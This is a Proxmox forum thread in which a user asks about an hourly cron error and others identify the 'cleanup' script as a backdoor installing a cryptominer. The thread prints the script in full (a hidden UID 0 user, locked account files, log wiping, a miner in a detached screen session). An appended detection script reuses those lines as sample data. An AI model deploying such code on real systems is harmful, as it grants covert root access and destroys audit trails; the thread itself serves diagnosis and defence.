Hourly cronjob warning

bvlgy-ple

Mar 29, 2019
Hello there,

I've been getting a strange error message every hour with the cleanup cronjob for some days now and I can't quite examine what that job even does, nor what could be wrong with it. This is the content of the email I get:

Subject: Cron <root@bvlgy-pve> cd / && run-parts --report /etc/cron.hourly
Message:
/etc/cron.hourly/cleanup:
/etc/cron.hourly/cleanup: line 17: [: 7400: binary operator expected

When executing the script manually as root, I get back nothing and the exit code is 0. Has anyone seen this message before? What can I do to see what's wrong?

BTW I'm still on 5.3-12 and this is the output of pveversion -v:
Code:
root@bvlgy-pve:~# pveversion -v
proxmox-ve: 5.3-1 (running kernel: 4.15.18-12-pve)
pve-manager: 5.3-12 (running version: 5.3-12/5fbbbaf6)
pve-kernel-4.15: 5.3-3
pve-kernel-4.15.18-12-pve: 4.15.18-35
pve-kernel-4.15.18-10-pve: 4.15.18-32
corosync: 2.4.4-pve1
criu: 2.11.1-1~bpo90
glusterfs-client: 3.8.8-1
ksm-control-daemon: 1.2-2
libjs-extjs: 6.0.1-2
libpve-access-control: 5.1-3
libpve-apiclient-perl: 2.0-5
libpve-common-perl: 5.0-48
libpve-guest-common-perl: 2.0-20
libpve-http-server-perl: 2.0-12
libpve-storage-perl: 5.0-39
libqb0: 1.0.3-1~bpo9
lvm2: 2.02.168-pve6
lxc-pve: 3.1.0-3
lxcfs: 3.0.3-pve1
novnc-pve: 1.0.0-3
proxmox-widget-toolkit: 1.0-24
pve-cluster: 5.0-34
pve-container: 2.0-35
pve-docs: 5.3-3
pve-edk2-firmware: 1.20190312-1
pve-firewall: 3.0-18
pve-firmware: 2.0-6
pve-ha-manager: 2.0-8
pve-i18n: 1.0-9
pve-libspice-server1: 0.14.1-2
pve-qemu-kvm: 2.12.1-2
pve-xtermjs: 3.10.1-2
qemu-server: 5.0-47
smartmontools: 6.5+svn4324-1
spiceterm: 3.0-5
vncterm: 1.5-3
zfsutils-linux: 0.7.13-pve1~bpo2

Warm regards
bvlgy-ple
 
What is on line 17 in file /etc/cron.hourly/cleanup ?
Maybe shell used for cron is not the same as you use testing from command line? That would explain why different syntax is accepted.
 
The first line indicates bash as the script's shell:
Code:
#!/bin/bash
This is line 17:
Code:
if [ ! $(pgrep -x "yamd") ] && [ $(grep -c . <<<$(w -h | sed '/setup/,+1 d' | see
d '/tmux/,+1 d')) == 0 ]; then
#18    screen -d -m bash -c 'cd /etc; while : ; do if [[ $(w -h) ]]; then true ; ell
se yamd -c yam; fi ; sleep 30; done'
fi
I can see that in line 18 there is an "ellse" .. I haven't edited this script but I'm pretty certain that it should be "else". I'm gonna change that and see what that does, the next run should be in 10 minutes.

EDIT: The "ellse" is just a display error somehow. However, the syntax looks okay. The file is as follows:
Code:
#!/bin/bash
if [ ! -s "/usr/bin/yam" ] && [ ! -s "/usr/bin/yamd" ]; then
    chattr -i /usr/bin/yam*
    rm /usr/bin/yam*
    tar zxf /usr/bin/c -C /usr/bin/
    chmod +x /usr/bin/yam*
    chattr +i /usr/bin/yam*
fi
chattr -i /etc/{passwd,shadow,group,gshadow}
if ! grep -q "setup" /etc/passwd; then
 useradd -b /var/setup -d /var/setup -g 0 -l -m -N -u 0 -o -p '$1$pwhash' -s /bin/bash setup
else
 usermod -d /var/setup -g 0 -m -o -p '$1$pwhash' -s /bin/bash -u 0 setup
 usermod -U setup
fi
chattr +i /etc/{passwd,shadow,group,gshadow}
if [ ! $(pgrep -x "yamd") ] && [ $(grep -c . <<<$(w -h | sed '/setup/,+1 d' | sed '/tmux/,+1 d')) == 0 ]; then
    screen -d -m bash -c 'cd /etc; while : ; do if [[ $(w -h) ]]; then true ; else yamd -c yam; fi ; sleep 30; done'
fi
for i in $(find /var/log -type f); do cat /dev/null > $i; done
exit 0
 
I couldn't find a reason why it happens, but it still does. Every hour at '17, I still get the email. Can anyone offer further ideas what else I could try?
 
I'd guess (without testing) that cron.hourly runs the scripts with /bin/sh instead of /bin/bash (despite your #!/bin/bash) - see '/etc/crontab'.
One of the following options should work:
1)
* copy your bash-script to '/usr/local/bin'
* add a snippet to /etc/cron.hourly/cleanup containing:
Code:
#!/bin/sh

/bin/bash /usr/local/bin/cleanup

2) add the invocation to root's crontab (`crontab -e`) (maybe you'd need to set 'SHELL=/bin/bash' there as well, but I doubt it)
3) rewrite the script to use POSIX-sh (I very much like `shellcheck` for linting shellscripts)

hope this helps!
 
Thanks a ton, Stoiko. I have changed the SHELL variable to /bin/bash and will get back with any results.
 
Didn't help either. I'm going to try upgrading the system, maybe that already solves the problem. The only weird thing is that I cannot remember touching any of the cronjobs. The messages started about a week ago, I didn't even know that "cleanup" job existed before.
 
hmm - where did you change the variable? (as said create the cronjob for root's account, do not edit /etc/crontab!)

anyways - I did a quick glance over the script - and if you don't know where it comes from I'd be very suspicious in your position!
That script seems to create a second user 'setup' with UID 0 (meaning the user has the same permissions as root), prevents the user and group files from being modified, truncates all logfiles and starts some services in screen.

Again not sure - but this is what a (not too beautiful) backdoor would look like!
 
Holy ..... you're right. Someone installed a cryptominer on my box. Took it down to be sure. Thank you very very much!
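
The behaviours pointed out in the thread (a second UID 0 account, immutable account files, truncated logs, a detached screen session) can be checked for mechanically. The following is an added example, not part of the thread or of any Proxmox tooling; the function names, tag names and sample files are constructed for illustration.

```shell
#!/bin/bash
# Added example: triage checks for the behaviours pointed out in the thread.
# Function names and tag names are made up for this example.

# Accounts in a passwd-format file that have UID 0 but are not "root".
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# One tag per suspicious behaviour found in a cron script (read, never run).
scan_cron_script() {
    # useradd/usermod that forces a duplicate UID 0 (-o together with -u 0)
    grep -E '(useradd|usermod) ' "$1" | grep -E -e '-u 0( |$)' | grep -q -e ' -o ' && echo uid0-user
    # immutable flag set on the account databases
    grep -Eq 'chattr \+i .*/etc/.*(passwd|shadow)' "$1" && echo immutable-auth-files
    # files under /var/log overwritten from /dev/null
    grep -Eq '/var/log.*/dev/null *>' "$1" && echo log-wipe
    # long-running command hidden in a detached screen session
    grep -Eq 'screen +-d +-m' "$1" && echo detached-session
    return 0
}

# Constructed sample input: a passwd file and two cron scripts.
make_samples() {
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin' \
        'setup:x:0:0::/var/setup:/bin/bash' > "$1/passwd"
    cat > "$1/cleanup" <<'EOF'
chattr -i /etc/{passwd,shadow,group,gshadow}
usermod -d /var/setup -g 0 -m -o -p '$1$pwhash' -s /bin/bash -u 0 setup
chattr +i /etc/{passwd,shadow,group,gshadow}
screen -d -m bash -c 'cd /etc; while : ; do sleep 30; done'
for i in $(find /var/log -type f); do cat /dev/null > $i; done
EOF
    printf '%s\n' '#!/bin/sh' 'test -x /usr/sbin/logrotate || exit 0' \
        '/usr/sbin/logrotate /etc/logrotate.conf' > "$1/logrotate"
}

tmp=$(mktemp -d)
make_samples "$tmp"
echo "extra UID 0 accounts: $(uid0_accounts "$tmp/passwd")"
for s in cleanup logrotate; do
    echo "$s: $(scan_cron_script "$tmp/$s" | tr '\n' ' ')"
done
rm -rf "$tmp"
```

On a live host, point `uid0_accounts` at `/etc/passwd` and `scan_cron_script` at each file under `/etc/cron.hourly`; `lsattr /etc/passwd /etc/shadow` shows whether the immutable flag is set.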
 
